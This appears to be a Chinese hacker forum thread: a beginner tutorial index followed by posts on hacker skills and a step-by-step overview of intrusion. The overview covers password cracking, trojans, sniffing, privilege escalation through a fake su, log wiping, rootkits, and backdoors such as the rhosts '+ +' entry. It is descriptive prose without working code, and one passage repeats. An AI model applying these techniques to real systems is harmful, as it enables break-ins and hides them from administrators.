菜鳥學(xué)習(xí)初級教程-----強烈推薦

<H1 class=fl id=subject_tpc>&nbsp;菜鳥學(xué)習(xí)初級教程-----強烈推薦</H1>
! {5 F. A+ H" J<DIV class=c id=p_tpc></DIV>
<DIV class=tpc_content id=read_tpc>我花了一夜時間整理，可能有些錯誤。<BR>由于文章比較多，我也就沒好細細的看，大家諒解下。<BR><BR>終于完了哈,累死我了........(樓數(shù)可能有點錯誤,大家請見諒!!)大家可以回復(fù)了!!<BR>基本技能...............................................................................2樓<BR>黑客初級技術(shù)講解（上）..........................................................3樓<BR>黑客初級技術(shù)講解（中）..........................................................4樓<BR>黑客初級技術(shù)講解（下）..........................................................5樓<BR>基礎(chǔ)知識（1）.......................................................................6樓<BR>基礎(chǔ)知識（2）.......................................................................7樓<BR>基礎(chǔ)知識（3）.......................................................................8樓<BR>基礎(chǔ)知識（4）.......................................................................9樓<BR>基礎(chǔ)知識（5）.....................................................................10樓<BR>基礎(chǔ)知識（6）.....................................................................11樓<BR>初級技術(shù).............................................................................12樓<BR>黑客兵器之木馬篇（上）........................................................13樓<BR>黑客兵器之木馬篇（下）........................................................14樓<BR>黑客兵器之掃描篇（上）........................................................15樓<BR><BR>第2頁<BR><BR>黑客兵器之掃描篇（下）........................................................16樓<BR>代理、肉雞、跳板的概念........................................................17樓<BR>網(wǎng)絡(luò)監(jiān)聽概念.......................................................................18樓<BR>系統(tǒng)進程信息.......................................................................19樓<BR>端口全解析（上）.................................................................20樓<BR>端口全解析（下）.................................................................21樓<BR>端口詳細說明表（上）...........................................................22樓<BR>端口詳細說明表（下）...........................................................23樓<BR>菜鳥進階（1）.....................................................................24樓<BR>...........................<BR>菜鳥進階（7）.....................................................................30樓<BR><BR>第3頁<BR><BR>菜鳥進階（8）.....................................................................31樓<BR>菜鳥進階（9）.....................................................................32樓<BR>1-32樓教程下載....................................................................33樓<BR>木馬防范及一些端口的關(guān)閉（上）............................................34樓<BR>木馬防范及一些端口的關(guān)閉（下）............................................35樓<BR>黑客竊取密碼及防范..............................................................36樓<BR>SSL.TLS.WTLS原理（上）.....................................................37樓<BR>SSL.TLS.WTLS原理（下）.....................................................38樓<BR>關(guān)于MAC地址和IP地址的知識..................................................39樓<BR>術(shù)語表（1）........................................................................40樓<BR>.........................<BR>術(shù)語表（4）........................................................................44樓<BR>34樓-44樓內(nèi)容下載...............................................................45樓<BR><BR>第4頁<BR>個人電腦安全.......................................................................46樓<BR>網(wǎng)絡(luò)安全知識（1）...............................................................47樓<BR>........................<BR>網(wǎng)絡(luò)安全知識（7）...............................................................53樓<BR>防范非系統(tǒng)用戶破壞..............................................................54樓<BR>44-54樓內(nèi)容下載..................................................................55樓<BR>黑客掃描特征及易受攻擊端口..................................................56樓<BR>開始..運行..命令集合.............................................................57樓<BR>PING命令及使用技巧.............................................................58樓<BR>GHOST詳細解說（1）...........................................................59樓<BR>GHOST詳細解說（2）...........................................................60樓<BR><BR>第5頁<BR><BR>GHOST詳細解說（3）...........................................................61樓<BR>56樓到61樓內(nèi)容下載.............................................................62樓<BR>ipc$詳細解說大全（1）..........................................................63樓<BR>..............................<BR>ipc$詳細解說大全（5）..........................................................67樓<BR>I P C $ 入 侵圖文結(jié)合............................................................68樓<BR>常見ASP腳本攻擊及防范技巧...................................................69樓<BR>37秒迅速破解網(wǎng)吧.................................................................70樓<BR>開啟3389的5種方法（上）......................................................71樓<BR>開啟3389的5種方法（下）......................................................71樓<BR>網(wǎng)絡(luò)常見攻擊及防范手冊（上）................................................73樓<BR>網(wǎng)絡(luò)常見攻擊及防范手冊（下）................................................74樓<BR>DOS攻擊原理及方法介紹.........................................................75樓<BR><BR>第6頁<BR><BR>如何突破各種防火墻..............................................................76樓<BR>蠕蟲技術(shù)（上）....................................................................77樓<BR>蠕蟲技術(shù)（中）....................................................................78樓<BR>蠕蟲技術(shù)（下）....................................................................79樓<BR>殼（上）.............................................................................80樓<BR>殼（下）.............................................................................81樓<BR>簡單黑客工具使用.................................................................82樓<BR>淺談綁定之應(yīng)用....................................................................83樓<BR>永遠的后門..........................................................................84樓<BR>入門者如何獲得肉雞..............................................................85樓<BR>流光的使用方法....................................................................86樓<BR>玩木馬................................................................................87樓<BR>溢出專集.............................................................................88樓<BR>NET START可以起用命令一覽表（上）.....................................89樓<BR>NET START可以起用命令一覽表（下）.....................................90樓</DIV>

<DIV class=tpc_content id=read_486>一個黑客的基本技能<BR><BR>１、黑客的精神態(tài)度是很重要的，但技術(shù)則更是重要。黑客的態(tài)度雖然是無可取代，隨著新科技的發(fā)明和舊技術(shù)的取代,這些工具隨時間在慢慢的改變。例如:以往總是會學(xué)會用機器碼寫程序，直到最近我們開始使用HTML。不過，在1996年末,當(dāng)然，這是基礎(chǔ)的hacking技能。在1997年，理所當(dāng)然的，你必須學(xué)會C。 但,如果你只是學(xué)一種語言，那么你不能算是一位黑客，了不起只能算是一個programmer。除此,你還必須學(xué)會學(xué)會以獨立于任何程序語言之上的概括性觀念來思考一件程序設(shè)計上的問題。要成為一位真正的黑客，你必須要能在幾天之內(nèi)將manual內(nèi)容和你目前己經(jīng)知道的關(guān)連起學(xué)會一種新的語言。也就是說，你必會學(xué)還了C之外的東西，你至少還要會LISP或Perl(Java也正在努力的擠上這個名單; 譯者注: 我很懷疑這份名單)。除了幾個重要的hacking常用語言之外，這些語言提供你一些不同的程序設(shè)計途徑，并且讓你在好的方法中學(xué)習(xí)。 <BR><BR>程序設(shè)計是一種復(fù)雜的技術(shù)，我沒辨法在這提供完整的學(xué)習(xí)步驟。但是我能告訴你一些在書本上和課堂上所沒有的東西(有很多，幾乎全部最好的黑客們都是自習(xí)而來的)。(a) 讀別人的程序碼；(寫程序，這兩項是不錯的方法。學(xué)習(xí)寫程序就像在學(xué)習(xí)寫一種良好的自然語言，最好的方法是去看一些專家們所寫的東西，然后寫一些你自己的東西，然后讀更多，再寫更多。然后一直持續(xù)，一直到你發(fā)展出一種屬于自己的風(fēng)格和特色。要找到好的程序碼來看是很一件很困難的事，因為，對菜鳥黑客們而言，適于供他們閱讀和努力的大型程序的source數(shù)量很少。但這事己有了戲劇性的變化了; 現(xiàn)在免費的供應(yīng)的軟件、程序設(shè)計工具和操作系統(tǒng)(大都公開提供 source，而且全都是由黑客們寫成的)到處可看。進入下一個主題。 <BR><BR>２、取得一個免費的 UNIX，并學(xué)習(xí)使用和維護。我先假設(shè)你己經(jīng)有一部個人電腦或者是可以使用任何一部(現(xiàn)在的小孩子真幸福，可如此輕易的擁有 :-))。 取得黑客技巧的第一個步驟是取得一份Linux 或者一份免費的 BSD-Unix，并將它安裝在自己的機器，并使之順利的運作。沒錯，在這個世界上除了Unix之外，還有其它的操作系統(tǒng)。但是他們只提供bianry，你不能看到他們的程序碼，你也不能修改他們。想要在DOS或Windows或MacOS開始hacking，無疑就是要你綁著枷鎖跳舞一樣。 <BR><BR>除此之外，Unix是Internet上的操作系統(tǒng)。當(dāng)你在不懂Unix的情況下學(xué)習(xí)使用Internet時，你沒辨法在不懂Unix的情況下成為Internet的黑客。因為這個原故，現(xiàn)在的黑客文化還是很牢固的以Unix為中心。(這并不完全是正確的，而且有些活在舊時代的黑客甚至也不喜歡這種情形，但是Unix和Internet之間的共生共成己經(jīng)到了牢不可破的地步，即使是Microsoft的大塊肌肉也沒能在上面留下明顯的傷痕。) 因些，把Unix裝起來吧! (我自己是喜歡Linux，但是還有其它的東東可用。) 學(xué)習(xí)它，讓它運作起來，讓它陪你努力精進。 用他向整個Internet喊話?？闯绦虼a，改程序。 <BR><BR>有一天你成為一位高竿的黑客，你回頭往后看時會發(fā)現(xiàn)，你得到比Microsoft操作系統(tǒng)所能提供的還要好的程序設(shè)計工具(包括 C，Lisp和 Perl)。而且得到快樂，并學(xué)到比共生共成己經(jīng)到了牢不可破的地步，即使是Microsoft的大塊肌肉也沒能在上面留下明顯的傷痕。) 因些，把Unix裝起來吧! (我自己是喜歡Linux，但是還有其它的東東可用。) 學(xué)習(xí)它，讓它運作起來，讓它陪你努力精進。用他向整個Internet喊話。 看程序碼，改程序。有一天你成為一位高竿的黑客，你回頭往后看時會發(fā)現(xiàn)，你得到比Microsoft操作系統(tǒng)所能提供的還要好的程序設(shè)計工具(包括 C，Lisp和 Perl)。而且得到快樂，并 <BR>學(xué)到比你想像中的還要多的知識。關(guān)于學(xué)習(xí)Unix，在Loginataka有更多的資料。(<A href="http://www.ccil.org/~esr/faqs/loginataka" target=_blank><FONT color=#2f5fa1>http://www.ccil.org/~esr/faqs/loginataka</FONT></A>。) <BR>看一下Linux distribution的目錄或 Linux CD，并把自己交付給它。 <BR><BR>3、學(xué)習(xí)使用World Wide Web并學(xué)會寫 HTML。 <BR>在黑客文化創(chuàng)造出來的東西，大多在他們的活動范圍外被使用著，如,在工廠和辨公室或大學(xué)被漠漠的使用著。但Web是一個很大的例外，這個黑客眼中的大玩具甚至還被政客們接受，并巧巧的在改變這個世界。因此(還有很多好的理由)，你必須學(xué)習(xí)Web。并不只是學(xué)習(xí)使用browser(這太容易了)而己，還要學(xué)會寫HTML這個Web的標簽語言。如果你不知道如何設(shè)計程序，寫HTML也可以給一些習(xí)慣上的幫助。嗯!! 建立home page吧! 不過，有一個home page 并沒任何特別之處能讓你成為一位黑客。Web上到處都是home page，而且大部份都沒什么重點，沒什么內(nèi)容的爛泥 -- 很好看的爛泥巴，但是看起來都一樣，差不多。 <BR><BR>4、至少學(xué)會以下的其中兩種： <BR>一、網(wǎng)站服務(wù)器程序ASP、PHP、CGI、jsP <BR>我個人認為CGI是最難學(xué)的其中一種。 <BR>二、程序語言：C語言、C++、VB、JAVA、PERL、DELPHI、匯編語言 <BR>不過我認為C語言的通用性最好，可以跨平臺（操作系統(tǒng)）使用。 <BR>還要試著自己寫程序、開發(fā)軟件等工作。 <BR>三、數(shù)據(jù)庫管理軟件：MYSQL、SQL、FOXPRO……等。 <BR>四、幾種常用的操作系統(tǒng)：WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能學(xué)到UNIX那是最好不過的了。最最基本的WIN2K、WINNT也要學(xué)會吧。 <BR>如果以上的你都會了，那么你已經(jīng)是個高手了。</DIV>

<DIV class=tpc_content id=read_487>黑客初級技術(shù)講解（上）<BR><BR>網(wǎng)絡(luò)安全從其本質(zhì)上來講就是網(wǎng)絡(luò)上的信息安全。從廣義來說，凡是涉及到網(wǎng)絡(luò)上信息的保密性、完整性、可用性、真實性和可控性的相關(guān)技術(shù)和理論都是網(wǎng)絡(luò)安全的研究領(lǐng)域。確保網(wǎng)絡(luò)系統(tǒng)的信息安全是網(wǎng)絡(luò)安全的目標，信息安全包括兩個方面：信息的存 儲安全和信息的傳輸安全。信息的存儲安全是指信息在靜態(tài)存放狀態(tài)下的安全，如是否會被非授權(quán)調(diào)用等。信息的傳輸安全是指信息在動態(tài)傳輸過程中安全。為了確保網(wǎng)絡(luò)信息的傳輸安全，有以下幾個問題： <BR><BR>　?。ǎ保W(wǎng)絡(luò)上信息的監(jiān)聽 <BR>　?。ǎ玻τ脩羯矸莸姆旅?<BR>　?。ǎ常W(wǎng)絡(luò)上信息的篡改 <BR>　　（４）對發(fā)出的信息予以否認 <BR>　?。ǎ担π畔⑦M行重發(fā) <BR><BR>　　對于一般的常用入侵方法主要有 <BR><BR>　　1.口令入侵 <BR><BR>　　所謂口令入侵，就是指用一些軟件解開已經(jīng)得到但被人加密的口令文檔，不過許多黑客已大量采用一種可以繞開或屏蔽口令保護的程序來完成這項工作。對于那些可以解開或屏蔽口令保護的程序通常被稱為“Crack”。由于這些軟件的廣為流傳，使得入侵電腦網(wǎng)絡(luò)系統(tǒng)有時變得相當(dāng)簡單，一般不需要很深入了解系統(tǒng)的內(nèi)部結(jié)構(gòu)，是初學(xué)者的好方法。 <BR><BR>　　2.特洛伊木馬術(shù) <BR><BR>　　說到特洛伊木馬，只要知道這個故事的人就不難理解，它最典型的做法可能就是把一個能幫助黑客完成某一特定動作的程序依附在某一合法用戶的正常程序中，這時合法用戶的程序代碼已被該變。一旦用戶觸發(fā)該程序，那么依附在內(nèi)的黑客指令代碼同時被激活，這些代碼往往能完成黑客指定的任務(wù)。由于這種入侵法需要黑客有很好的編程經(jīng)驗，且要更改代碼、要一定的權(quán)限，所以較難掌握。但正因為它的復(fù)雜性，一般的系統(tǒng)管理員很難發(fā)現(xiàn)。 <BR><BR>　　3.監(jiān)聽法 <BR><BR>　　這是一個很實用但風(fēng)險也很大的黑客入侵方法，但還是有很多入侵系統(tǒng)的黑客采用此類方法，正所謂藝高人膽大。 <BR><BR>　　網(wǎng)絡(luò)節(jié)點或工作站之間的交流是通過信息流的轉(zhuǎn)送得以實現(xiàn)，而當(dāng)在一個沒有集線器的網(wǎng)絡(luò)中，數(shù)據(jù)的傳輸并沒有指明特定的方向，這時每一個網(wǎng)絡(luò)節(jié)點或工作站都是一個接口。這就好比某一節(jié)點說：“嗨！你們中有誰是我要發(fā)信息的工作站?！?<BR><BR>　　此時，所有的系統(tǒng)接口都收到了這個信息，一旦某個工作站說：“嗨！那是我，請把數(shù)據(jù)傳過來?！甭?lián)接就馬上完成。 <BR><BR>　　目前有網(wǎng)絡(luò)上流傳著很多嗅探軟件，利用這些軟件就可以很簡單的監(jiān)聽到數(shù)據(jù)，甚至就包含口令文件，有的服務(wù)在傳輸文件中直接使用明文傳輸，這也是非常危險的 <BR>4.E-mail技術(shù) <BR><BR>　　使用email加木馬程序這是黑客經(jīng)常使用的一種手段，而且非常奏效，一般的用戶，甚至是網(wǎng)管，對網(wǎng)絡(luò)安全的意識太過于淡薄，這就給很多黑客以可乘之機。 <BR><BR>　　5.病毒技術(shù) <BR>　　作為一個黑客，如此使用應(yīng)該是一件可恥的事情，不過大家可以學(xué)習(xí)，畢竟也是一種攻擊的辦法，特殊時間，特殊地點完全可以使用。 <BR><BR>　　6.隱藏技術(shù) <BR><BR>　　網(wǎng)絡(luò)攻擊的一般步驟及實例 <BR><BR>　　攻擊的準備階段 <BR><BR>　　首先需要說明的是，入侵者的來源有兩種，一種是內(nèi)部人員利用自己的工作機會和權(quán)限來獲取不應(yīng)該獲取的權(quán)限而進行的攻擊。另一種是外部人員入侵，包括遠程入侵、網(wǎng)絡(luò)節(jié)點接入入侵等。本節(jié)主要討論遠程攻擊。 <BR><BR>　　進行網(wǎng)絡(luò)攻擊是一件系統(tǒng)性很強的工作，其主要工作流程是：收集情報，遠程攻擊，遠程登錄，取得普通用戶的權(quán)限，取得超級用戶的權(quán)限，留下后門，清除日志。主要內(nèi)容包括目標分析，文檔獲取，破解密碼，日志清除等技術(shù)，下面分別介紹。 <BR><BR>　　1.確定攻擊的目的 <BR><BR>　　攻擊者在進行一次完整的攻擊之前首先要確定攻擊要達到什么樣的目的，即給對方造成什么樣的后果。常見的攻擊目的有破壞型和入侵型兩種。破壞型攻擊指的只是破壞攻擊目標，使其不能正常工作，而不能隨意控制目標的系統(tǒng)的運行。要達到破壞型攻擊的目的，主要的手段是拒絕服務(wù)攻擊（Denial Of Service）。另一類常見的攻擊目的是入侵攻擊目標，這種攻擊是要獲得一定的權(quán)限來達到控制攻擊目標的目的。應(yīng)該說這種攻擊比破壞型攻擊更為普遍，威脅性也更大。因為黑客一旦獲取攻擊目標的管理員權(quán)限就可以對此服務(wù)器做任意動作，包括破壞性的攻擊。此類攻擊一般也是利用服務(wù)器操作系統(tǒng)、應(yīng)用軟件或者網(wǎng)絡(luò)協(xié)議存在的漏洞進行的。當(dāng)然還有另一種造成此種攻擊的原因就是密碼泄露，攻擊者靠猜測或者窮舉法來得到服務(wù)器用戶的密碼，然后就可以用和真正的管理員一樣對服務(wù)器進行訪問。 <BR><BR>　　2.信息收集 <BR><BR>　　除了確定攻擊目的之外，攻擊前的最主要工作就是收集盡量多的關(guān)于攻擊目標的信息。這些信息主要包括目標的操作系統(tǒng)類型及版本，目標提供哪些服務(wù)，各服務(wù)器程序的類型與版本以及相關(guān)的社會信息。 <BR><BR>　　要攻擊一臺機器，首先要確定它上面正在運行的操作系統(tǒng)是什么，因為對于不同類型的操作系統(tǒng)，其上的系統(tǒng)漏洞有很大區(qū)別，所以攻擊的方法也完全不同，甚至同一種操作系統(tǒng)的不同版本的系統(tǒng)漏洞也是不一樣的。要確定一臺服務(wù)器的操作系統(tǒng)一般是靠經(jīng)驗，有些服務(wù)器的某些服務(wù)顯示信息會泄露其操作系統(tǒng)。例如當(dāng)我們通過TELNET連上一臺機器時，如果顯示 <BR><BR>　　Unix（r）System V Release 4．0 <BR>　　login： <BR><BR>　　那么根據(jù)經(jīng)驗就可以確定這個機器上運行的操作系統(tǒng)為SUN OS 5．5或5．5．l。但這樣確定操作系統(tǒng)類型是不準確的，因為有些網(wǎng)站管理員為了迷惑攻擊者會故意更改顯示信息，造成假象。 <BR>還有一種不是很有效的方法，諸如查詢DNS的主機信息（不是很可靠）來看登記域名時的申請機器類型和操作系統(tǒng)類型，或者使用社會工程學(xué)的方法來獲得，以及利用某些主機開放的SNMP的公共組來查詢。 <BR><BR>　　另外一種相對比較準確的方法是利用網(wǎng)絡(luò)操作系統(tǒng)里的TCP/IP堆棧作為特殊的“指紋”來確定系統(tǒng)的真正身份。因為不同的操作系統(tǒng)在網(wǎng)絡(luò)底層協(xié)議的各種實現(xiàn)細節(jié)上略有不同?？梢酝ㄟ^遠程向目標發(fā)送特殊的包，然后通過返回的包來確定操作系統(tǒng)類型。例如通過向目標機發(fā)送一個FIN的包（或者是任何沒有ACK或SYN標記的包）到目標主機的一個開放的端口然后等待回應(yīng)。許多系統(tǒng)如windows、 BSDI、 CISCO、 HP／UX和 IRIX會返回一個RESET。通過發(fā)送一個SYN包，它含有沒有定義的TCP標記的TCP頭。那么在Linux系統(tǒng)的回應(yīng)包就會包含這個沒有定義的標記，而在一些別的系統(tǒng)則會在收到SYN+BOGU包之后關(guān)閉連接?；蚴抢脤ふ页跏蓟蛄虚L度模板與特定的操作系統(tǒng)相匹配的方法。利用它可以對許多系統(tǒng)分類，如較早的Unix系統(tǒng)是64K長度，一些新的Unix系統(tǒng)的長度則是隨機增長。還有就是檢查返回包里包含的窗口長度，這項技術(shù)根據(jù)各個操作系統(tǒng)的不同的初始化窗口大小來唯一確定它們。利用這種技術(shù)實現(xiàn)的工具很多，比較著名的有NMAP、CHECKOS、QUESO等。 <BR><BR>　　獲知目標提供哪些服務(wù)及各服務(wù)daemon的類型、版本同樣非常重要，因為已知的漏洞一般都是對某一服務(wù)的。這里說的提供服務(wù)就是指通常我們提到的喘口，例如一般TELNET在23端口，F(xiàn)TP在對21端口，WWW在80端口或8080端口，這只是一般情況，網(wǎng)站管理完全可以按自己的意愿修改服務(wù)所監(jiān)聽的端口號。在不同服務(wù)器上提供同一種服務(wù)的軟件也可以是不同，我們管這種軟件叫做daemon，例如同樣是提供FTP服務(wù)，可以使用wuftp、proftp，ncftp等許多不同種類的daemon。確定daemon的類型版本也有助于黑客利用系統(tǒng)漏洞攻破網(wǎng)站。 <BR><BR>　　另外需要獲得的關(guān)于系統(tǒng)的信息就是一些與計算機本身沒有關(guān)系的社會信息，例如網(wǎng)站所屬公司的名稱、規(guī)模，網(wǎng)絡(luò)管理員的生活習(xí)慣、電話號碼等。這些信息看起來與攻擊一個網(wǎng)站沒有關(guān)系，實際上很多黑客都是利用了這類信息攻破網(wǎng)站的。例如有些網(wǎng)站管理員用自己的電話號碼做系統(tǒng)密碼，如果掌握了該電話號碼，就等于掌握了管理員權(quán)限進行信息收集可以用手工進行，也可以利用工具來完成，完成信息收集的工具叫做掃描器。用掃描器收集信息的優(yōu)點是速度快，可以一次對多個目標進行掃描。 <BR><BR>　　攻擊的實施階段 <BR><BR>　　1.獲得權(quán)限 <BR><BR>　　當(dāng)收集到足夠的信息之后，攻擊者就要開始實施攻擊行動了。作為破壞性攻擊，只需利用工具發(fā)動攻擊即可。而作為入侵性攻擊，往往要利用收集到的信息，找到其系統(tǒng)漏洞，然后利用該漏洞獲取一定的權(quán)限。有時獲得了一般用戶的權(quán)限就足以達到修改主頁等目的了，但作為一次完整的攻擊是要獲得系統(tǒng)最高權(quán)限的，這不僅是為了達到一定的目的，更重要的是證明攻擊者的能力，這也符合黑客的追求。 <BR><BR>　　能夠被攻擊者所利用的漏洞不僅包括系統(tǒng)軟件設(shè)計上的安全漏洞，也包括由于管理配置不當(dāng)而造成的漏洞。前不久，因特網(wǎng)上應(yīng)用最普及的著名www服務(wù)器提供商Apache的主頁被黑客攻破，其主頁面上的 Powered by Apache圖樣（羽毛狀的圖畫）被改成了Powered by　Microsoft Backoffice的圖樣，那個攻擊者就是利用了管理員對Webserver用數(shù)據(jù)庫的一些不當(dāng)配置而成功取得最高權(quán)限的。</DIV>

<DIV class=tpc_content id=read_488>黑客初級技術(shù)講解（中）<BR><BR>　　當(dāng)然大多數(shù)攻擊成功的范例還是利用了系統(tǒng)軟件本身的漏洞。造成軟件漏洞的主要原因在于編制該軟件的程序員缺乏安全意識。當(dāng)攻擊者對軟件進行非正常的調(diào)用請求時造成緩沖區(qū)溢出或者對文件的非法訪問。其中利用緩沖區(qū)溢出進行的攻擊最為普遍，據(jù)統(tǒng)計80％以上成功的攻擊都是利用了緩沖區(qū)溢出漏洞來獲得非法權(quán)限的。關(guān)于緩沖區(qū)溢出在后面用專門章節(jié)來作詳細解釋。 <BR><BR>　　無論作為一個黑客還是一個網(wǎng)絡(luò)管理員，都需要掌握盡量多的系統(tǒng)漏洞。黑客需要用它來完成攻擊，而管理員需要根據(jù)不同的漏洞來進行不同的防御措施。了解最新最多的漏洞信息，可以到諸如Rootshell（<A href="http://www.rootshell/" target=_blank><FONT color=#2f5fa1>www.rootshell</FONT></A>．com）、Packetstorm（packetstorm．securify．com）、Securityfocus（<A href="http://www.securityfocus/" target=_blank><FONT color=#2f5fa1>www.securityfocus</FONT></A>．com）等網(wǎng)站去查找。 <BR><BR>　　2.權(quán)限的擴大 <BR><BR>　　系統(tǒng)漏洞分為遠程漏洞和本地漏洞兩種，遠程漏洞是指黑客可以在別的機器上直接利用該漏洞進行攻擊并獲取一定的權(quán)限。這種漏洞的威脅性相當(dāng)大，黑客的攻擊一般都是從遠程漏洞開始的。但是利用遠程漏洞獲取的不一定是最高權(quán)限，而往往只是一個普通用戶的權(quán)限，這樣常常沒有辦法做黑客們想要做的事。這時就需要配合本地漏洞來把獲得的權(quán)限進行擴大，常常是擴大至系統(tǒng)的管理員權(quán)限。 <BR>只有獲得了最高的管理員權(quán)限之后，才可以做諸如網(wǎng)絡(luò)監(jiān)聽、打掃痕跡之類的事情。要完成權(quán)限的擴大，不但可以利用已獲得的權(quán)限在系統(tǒng)上執(zhí)行利用本地漏洞的程序，還可以放一些木馬之類的欺騙程序來套取管理員密碼，這種木馬是放在本地套取最高權(quán)限用的，而不能進行遠程控制。例如一個黑客已經(jīng)在一臺機器上獲得了一個普通用戶的賬號和登錄權(quán)限，那么他就可以在這臺機器上放置一個假的su程序。一旦黑客放置了假su程序，當(dāng)真正的合法用戶登錄時，運行了su，并輸入了密碼，這時root密碼就會被記錄下來，下次黑客再登錄時就可以使用su變成root了。 <BR><BR>　　攻擊的善后工作 <BR><BR>　　1.日志系統(tǒng)簡介 <BR><BR>　　如果攻擊者完成攻擊后就立刻離開系統(tǒng)而不做任何善后工作，那么他的行蹤將很快被系統(tǒng)管理員發(fā)現(xiàn)，因為所有的網(wǎng)絡(luò)操作系統(tǒng)一般都提供日志記錄功能，會把系統(tǒng)上發(fā)生的動作記錄下來。所以，為了自身的隱蔽性，黑客一般都會抹掉自己在日志中留下的痕跡。想要了解黑客抹掉痕跡的方法，首先要了解常見的操作系統(tǒng)的日志結(jié)構(gòu)以及工作方式。Unix的日志文件通常放在下面這幾個位置，根據(jù)操作系統(tǒng)的不同略有變化 <BR><BR>　　／usr／adm——早期版本的Unix。 <BR>　　／Var／adm新一點的版本使用這個位置。 <BR>　　／Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用這個位置。 <BR>　?。痚tc，大多數(shù)Unix版本把Utmp放在此處，一些Unix版本也把Wtmp放在這里，這也是Syslog．conf的位置。 <BR><BR>　　下面的文件可能會根據(jù)你所在的目錄不同而不同： <BR><BR>　　acct或pacct－一記錄每個用戶使用的命令記錄。 <BR>　　accesslog主要用來服務(wù)器運行了NCSA HTTP服務(wù)器，這個記錄文件會記錄有什么站點連接過你的服務(wù)器。 <BR>　　aculo保存撥出去的Modems記錄。 <BR>　　lastlog記錄了最近的Login記錄和每個用戶的最初目的地，有時是最后不成功Login的記錄。 <BR>　　loginlog一記錄一些不正常的L0gin記錄。 <BR>　　messages——記錄輸出到系統(tǒng)控制臺的記錄，另外的信息由Syslog來生成 <BR>　　security記錄一些使用 UUCP系統(tǒng)企圖進入限制范圍的事例。 <BR>　　sulog記錄使用su命令的記錄。 <BR>　　utmp記錄當(dāng)前登錄到系統(tǒng)中的所有用戶，這個文件伴隨著用戶進入和離開系統(tǒng)而不斷變化。 <BR>　　Utmpx，utmp的擴展。 <BR>　　wtmp記錄用戶登錄和退出事件。 <BR>　　Syslog最重要的日志文件，使用syslogd守護程序來獲得。 <BR><BR>　　2.隱藏蹤跡 <BR><BR>　　攻擊者在獲得系統(tǒng)最高管理員權(quán)限之后就可以隨意修改系統(tǒng)上的文件了（只對常規(guī) Unix系統(tǒng)而言），包括日志文件，所以一般黑客想要隱藏自己的蹤跡的話，就會對日志進行修改。最簡單的方法當(dāng)然就是刪除日志文件了，但這樣做雖然避免了系統(tǒng)管理員根據(jù)IP追蹤到自己，但也明確無誤地告訴了管理員，系統(tǒng)己經(jīng)被人侵了。所以最常用的辦法是只對日志文件中有關(guān)自己的那一部分做修改。關(guān)于修改方法的具體細節(jié)根據(jù)不同的操作系統(tǒng)有所區(qū)別，網(wǎng)絡(luò)上有許多此類功能的程序，例如 zap、 wipe等，其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用戶的信息，使得當(dāng)使用w、who、last等命令查看日志文件時，隱藏掉此用戶的信息。 <BR>管理員想要避免日志系統(tǒng)被黑客修改，應(yīng)該采取一定的措施，例如用打印機實時記錄網(wǎng)絡(luò)日志信息。但這樣做也有弊端，黑客一旦了解到你的做法就會不停地向日志里寫入無用的信息，使得打印機不停地打印日志，直到所有的紙用光為止。所以比較好的避免日志被修改的辦法是把所有日志文件發(fā)送到一臺比較安全的主機上，即使用loghost。即使是這樣也不能完全避免日志被修改的可能性，因為黑客既然能攻入這臺主機，也很可能攻入loghost。 <BR><BR>　　只修改日志是不夠的，因為百密必有一漏，即使自認為修改了所有的日志，仍然會留下一些蛛絲馬跡的。例如安裝了某些后門程序，運行后也可能被管理員發(fā)現(xiàn)。所以，黑客高手可以通過替換一些系統(tǒng)程序的方法來進一步隱藏蹤跡。這種用來替換正常系統(tǒng)程序的黑客程序叫做rootkit，這類程序在一些黑客網(wǎng)站可以找到，比較常見的有LinuxRootKit，現(xiàn)在已經(jīng)發(fā)展到了5.0版本了。它可以替換系統(tǒng)的ls、ps、netstat、inetd等等一系列重要的系統(tǒng)程序，當(dāng)替換了ls后，就可以隱藏指定的文件，使得管理員在使用ls命令時無法看到這些文件，從而達到隱藏自己的目的。 <BR><BR>　　3.后門 <BR><BR>　　 一般黑客都會在攻入系統(tǒng)后不只一次地進入該系統(tǒng)。為了下次再進入系統(tǒng)時方便一點，黑客會留下一個后門，特洛伊木馬就是后門的最好范例。Unix中留后門的方法有很多種，下面介紹幾種常見的后門，供網(wǎng)絡(luò)管理員參考防范。 <BR><BR>　　&lt;1&gt;密碼破解后門 <BR>　　這是入侵者使用的最早也是最老的方法，它不僅可以獲得對Unix機器的訪問，而且可 以通過破解密碼制造后門。這就是破解口令薄弱的帳號。以后即使管理員封了入侵者的當(dāng)前帳號，這些新的帳號仍然可能是重新侵入的后門。多數(shù)情況下，入侵者尋找口令薄弱的未使用帳號，然后將口令改的難些。當(dāng)管理員尋找口令薄弱的帳號是，也不會發(fā)現(xiàn)這些密碼已修改的帳號。因而管理員很難確定查封哪個帳號。 <BR><BR>　　&lt;2&gt;Rhosts + + 后門 <BR>　　在連網(wǎng)的Unix機器中，象Rsh和Rlogin這樣的服務(wù)是基于rhosts文件里的主機名使用簡 單的認證方法。用戶可以輕易的改變設(shè)置而不需口令就能進入。 入侵者只要向可以訪問的某用戶的rhosts文件中輸入"+ +"，就可以允許任何人從任何地方無須口令便能進 入這個帳號。特別當(dāng)home目錄通過NFS向外共享時，入侵者更熱中于此。這些帳號也成 了入侵者再次侵入的后門。許多人更喜歡使用Rsh，因為它通常缺少日志能力. 許多管理員經(jīng)常檢查 "+ +"，所以入侵者實際上多設(shè)置來自網(wǎng)上的另一個帳號的主機名和 用戶名，從而不易被發(fā)現(xiàn)。 <BR><BR>　　&lt;3&gt;校驗和及時間戳后門 <BR>　　早期，許多入侵者用自己的trojan程序替代二進制文件。系統(tǒng)管理員便依靠時間戳和系 統(tǒng)校驗和的程序辨別一個二進制文件是否已被改變，如Unix里的sum程序。入侵者又發(fā)展了使trojan文件和原文件時間戳同步的新技術(shù)。它是這樣實現(xiàn)的: 先將系統(tǒng)時鐘撥 回到原文件時間，然后調(diào)整trojan文件的時間為系統(tǒng)時間。一旦二進制trojan文件與 原來的精確同步，就可以把系統(tǒng)時間設(shè)回當(dāng)前時間。Sum程序是基于CRC校驗，很容易 騙過。入侵者設(shè)計出了可以將trojan的校驗和調(diào)整到原文件的校驗和的程序。MD5是被 大多數(shù)人推薦的，MD5使用的算法目前還沒人能騙過。</DIV>

